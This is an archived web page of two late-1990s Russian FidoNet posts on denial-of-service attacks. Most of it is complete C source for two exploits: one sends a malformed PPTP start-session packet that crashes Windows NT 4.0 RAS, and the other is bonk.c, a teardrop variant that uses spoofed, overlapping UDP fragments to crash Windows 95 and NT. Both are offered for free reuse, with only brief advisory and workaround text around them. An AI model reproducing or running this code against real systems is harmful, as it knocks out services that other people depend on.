The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

DOS (Windoze NT RAS PPTP exploit)


<< Предыдущая ИНДЕКС Поиск в статьях src Установить закладку Перейти на закладку Следующая >>
_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
 From : Ricky Lyte                          2:5030/48.58    06 Dec 97  13:10:02 
 Subj : DOS (Windoze NT RAS PPTP exploit)                                                                    
________________________________________________________________________________
 AN>             Кто pаскажет что затип атаки такой Denial of Service ?

Бомбаpдиpовка сеpвеpа-жеpтвы, пока или коньки не отбpосит, или пеpестанет
pеагиpовать на новые соединения.

Hебольшой пpимеp:

Date:         Wed, 26 Nov 1997 11:48:13 -0600
From:         Kevin Wormington <kworm@SOFNET.COM>
Subject:      Potenial DOS in Windows NT RAS PPTP

Hi, this is my first posting so please excuse the style.  Please forgive me
if this has been posted before, but I have not seen it.  Also, I am unable
to test it with different hotfixes, etc.

I discovered that NT 4.0 w/SP3 and RAS PPTP is vulnerable to a DOS causing
core dump.  I have been working with point to point tunnelling protocol and
discovered (by accident) that if you send a pptp start session request with
an invalid packet length in the pptp packet header that it will crash an NT
box.

Here is a very crude code fragment that will exploit this behaviour:

/*
* Sample Windoze NT RAS PPTP exploit
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#define PPTP_MAGIC_COOKIE       0x1a2b3c4d
#define PPTP_CONTROL_HEADER_OFFSET  8
#define PPTP_REQUEST_OFFSET  12
typedef enum {
  PPTP_CONTROL_PACKET = 1,
  PPTP_MGMT_PACKET} PptpPacketType;
typedef enum {
  PPTP_START_SESSION_REQUEST = 1,
  PPTP_START_SESSION_REPLY,
  PPTP_STOP_SESSION_REQUEST,
  PPTP_STOP_SESSION_REPLY,
  PPTP_ECHO_REQUEST,
  PPTP_ECHO_REPLY,
  PPTP_OUT_CALL_REQUEST,
  PPTP_OUT_CALL_REPLY,
  PPTP_IN_CALL_REQUEST,
  PPTP_IN_CALL_REPLY,
  PPTP_IN_CALL_CONNECTED,
  PPTP_CALL_CLEAR_REQUEST,
  PPTP_CALL_DISCONNECT_NOTIFY,
  PPTP_WAN_ERROR_NOTIFY,
  PPTP_SET_LINK_INFO,
  PPTP_NUMBER_OF_CONTROL_MESSAGES} PptpControlMessageType;

typedef struct {
  u_short    packetLength;
  u_short    packetType;
  u_long     magicCookie;} PptpPacketHeader;
typedef struct {
  u_short    messageType;
  u_short    reserved;
} PptpControlHeader;
typedef struct {
  u_long     identNumber;} PptpEchoRequest;
typedef enum {
  PPTP_ECHO_OK = 1,
  PPTP_ECHO_GENERAL_ERROR} PptpEchoReplyResultCode;
typedef struct {
  u_long     identNumber;
  u_char     resultCode;
  u_char     generalErrorCode;
  u_short    reserved;} PptpEchoReply;
#define PPTP_FRAME_CAP_ASYNC      0x00000001L
#define PPTP_FRAME_CAP_SYNC       0x00000002L
#define PPTP_BEARER_CAP_ANALOG    0x00000001L
#define PPTP_BEARER_CAP_DIGITAL   0x00000002L
typedef struct {
  u_short     protocolVersion;
  u_char      reserved1;
  u_char      reserved2;
  u_long      framingCapability;
  u_long      bearerCapability;
  u_short     maxChannels;
  u_short     firmwareRevision;
  char        hostName[64];
  char        vendorString[64];} PptpStartSessionRequest;
int pptp_start_session (int);
int main(int argc, char **argv)
    {
    int pptp_sock, i, s, offset;
    u_long src_ip, dst_ip = 0;
    struct in_addr addr;
    struct sockaddr_in sn;
    struct hostent *hp;
    struct servent *sp;
    fd_set ctl_mask;
    char buf[2048];
    if((pptp_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      {
      perror("tcp socket");
      exit(1);
      }
    sp = getservbyname("pptp", "tcp"); /* port 1723 */
    if (!sp)
      {
      fprintf(stderr, "pptp: tcp/pptp: unknown service\n");
      exit(1);
      }
    hp = gethostbyname(argv[1]);
    if (!hp) { fprintf (stderr, "Address no good.\n"); exit(1); }

    memset(&sn, 0, sizeof(sn));
    sn.sin_port = sp->s_port;
    sn.sin_family = hp->h_addrtype;
    if (hp->h_length > (int)sizeof(sn.sin_addr))
      {
      hp->h_length = sizeof(sn.sin_addr);
      }
    memcpy(&sn.sin_addr, hp->h_addr, hp->h_length);
    if (connect(pptp_sock, (struct sockaddr *)&sn, sizeof(sn)) < 0)
      {
      perror("pptp: can't connect");
      close(s);
      exit(1);
      }
    pptp_start_session(pptp_sock);
    fprintf(stderr, "Done\n");
    close(pptp_sock);
    return (0);
    }
int pptp_start_session (int sock)
  {
  PptpPacketHeader packetheader;
  PptpControlHeader controlheader;
  PptpStartSessionRequest sessionrequest;
  char packet[200];
  int offset;
  packetheader.packetLength = htons (20);  /* whoops, i forgot to change it
*/
  packetheader.packetType = htons(PPTP_CONTROL_PACKET);
  packetheader.magicCookie = htonl(PPTP_MAGIC_COOKIE);
  controlheader.messageType = htons(PPTP_START_SESSION_REQUEST);
  controlheader.reserved = 0;
  sessionrequest.protocolVersion = htons(1);
  sessionrequest.reserved1 = 0;
  sessionrequest.reserved2 = 0;
  sessionrequest.framingCapability = htonl(PPTP_FRAME_CAP_ASYNC);
  sessionrequest.bearerCapability = htonl(PPTP_BEARER_CAP_ANALOG);
  sessionrequest.maxChannels = htons(32);
  sessionrequest.firmwareRevision = htons(1);
  memset(&sessionrequest.hostName, 0, sizeof (sessionrequest.hostName));
  sprintf (sessionrequest.hostName, "%s", "mypc.anywhere.com");
  memset(&sessionrequest.vendorString, 0, sizeof
(sessionrequest.vendorString));
  sprintf (sessionrequest.vendorString, "%s", "Any Vendor");
  memset(&packet, 0, sizeof(packet));
  memcpy(&packet, &packetheader, sizeof(packetheader));
  memcpy(&packet[PPTP_CONTROL_HEADER_OFFSET], &controlheader,
                                          sizeof(controlheader));
  memcpy(&packet[PPTP_REQUEST_OFFSET], &sessionrequest,
                                          sizeof(sessionrequest));
  send (sock, &packet, 156, 0);
  return (0);
  }

 AN>             Или вот еще вопpос : можно ли как-нибудь обойти shadowing
 AN> ?

Об этом в следyющей мессаге.


                                            Team Porno-Grafica

--- 1984!
 * Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)

_ Hе ходи! Засекурят (2:5077/15.22) ______________________________ RU.SECURITY _
 From : Stas Filshtinskiy                   2:461/33.47     10 Jan 98  09:57:20 
 Subj : new DOS attack                                                          
________________________________________________________________________________
   Приветствую тебя, All!

Вот почитайте ... опять ...

-----Original Message-----
From:   Jiva DeVoe [SMTP:jiva@devware.com]
Sent:   Thursday, January 08, 1998 7:53 PM
To:     ntsecurity@iss.net
Subject:        [NTSEC] New DOS exploit for NT and Win95 (CONFIRMED)

TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------

This is just an FYI.  I have confirmed and reproduced a new Denial of
Service exploit for Windows NT and Windows95.  Under Windows NT this
exploit causes a proverbial BSOD, under Windows95, this causes an
exception in IFSMGR.VXD.

This exploit has been reported to Microsoft!

Details

Without putting out a blueprint of how to cause this.  This is a
modified teardrop attack.  (NOTE: This DOES affect machines patched
against teardrop)  It utilizes UDP packets with altered headers.  I have
also provided Microsoft with source code to this exploit.

Temporary Workaround

Any workaround that would have been implemented against teardrop should
work against this issue.  By default, the UDP packets used in this
exploit are aimed at very high port numbers.  So perhaps by blocking UDP
packets destined for high port numbers, you might be able to prevent
this attack.  However, since it can be aimed at any port, a clever user
could get around filters such as this.  I'd be happy to talk to anyone
about other alternatives for working around this issue.

Please feel free to repost this to NTBUGTRAQ (I'm not on that list) or
wherever else you choose.

-------------
Jiva DeVoe
MCSE
Devware Systems
jiva@devware.com

И еще

-----Original Message-----
From:   Ken Williams [SMTP:jkwilli2@unity.ncsu.edu]
Sent:   Friday, January 09, 1998 8:14 AM
To:     NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; ntsecurity@iss.net
Subject:        [NTSEC] bonk.c - modified teardrop attack that affects patched
NT and Win95

TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------

here is the forwarded source code for the modified teardrop attack that
*supposedly* affects all patched NT and Win95 boxes.

Ken

/<--------------{ TATTOOMAN -aka- rute }-------------->\
  NCSU Computer Science    Member of E.H.A.P.
  jkwilli2@unity.ncsu.edu  http://www.hackers.com/ehap/
  UNIX ICQ UIN# 4231260    ehap@hackers.com
  FTP Site:  ftp://152.7.11.38/pub/personal/tattooman/
  WWW 2:     http://www4.ncsu.edu/~jkwilli2/
\<---------{ http://152.7.11.38/~tattooman/ }--------->/

---------- Forwarded message ----------
Date: 8 Jan 1998 20:52:46 -0000
From: announce-outgoing@rootshell.com
Cc: recipient list not shown:  ;
Subject: [rootshell] Security Bulletin #5

www.rootshell.com
Security Bulletin #5
January 8th, 1998

[ http://www.rootshell.com/ ]

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------

01. bonk.c - Modified teardrop attack.
--------------------------------------

These network DoS attacks sure are trendy now ...

/*
                                ==bendi - 1998==

                        bonk.c        -         5/01/1998
        Based On: teardrop.c by route|daemon9 & klepto
        Crashes *patched* win95/(NT?) machines.

        Basically, we set the frag offset > header length (teardrop
        reversed). There are many theories as to why this works,
        however i do not have the resources to perform extensive testing.
        I make no warranties. Use this code at your own risk.
        Rip it if you like, i've had my fun.

*/

#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST       0x3
#define PADDING         0x1c

struct udp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        datalen=100,
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */

void usage(void)
{
        fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
        exit(0);
}

u_long host_to_ip(char *host_name)
{
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);
}

void quit(char *reason)
{
        perror(reason);
        close(spf_sck);
        exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        int     bs;
        struct  sockaddr_in to;

        memset(&pkt, 0, psize);
                                                /* Fill in ip header */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING);
        pkt.ip.id = htons(0x455);
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IP_UDP;
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* more to come */

        pkt.udp.source = htons(src_prt);        /* udp header */
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;
}

void main(int argc, char *argv[])
{
        u_long  src_addr,
                dst_addr;

        int     i,
                src_prt=53,
                dst_prt=53,
                bs = 1,
                pkt_count = 10;         /* Default amount */

        if (argc < 3)
                usage();

        if (argc == 4)
                pkt_count = atoi(argv[3]);      /* 10 does the trick */

        /* Resolve hostnames */

        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i)
        {
                fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
                usleep(10000);
        }

        printf("Done.\n");
}

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------



    С уважением,
                            Stas
                    Sat Jan 10 1998 09:58.

--- GEcho 1.20/Pro
 * Origin: 4F @ Home ! (2:461/33.47)



<< Предыдущая ИНДЕКС Поиск в статьях src Установить закладку Перейти на закладку Следующая >>

 Добавить комментарий
Имя:
E-Mail:
Заголовок:
Текст:




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру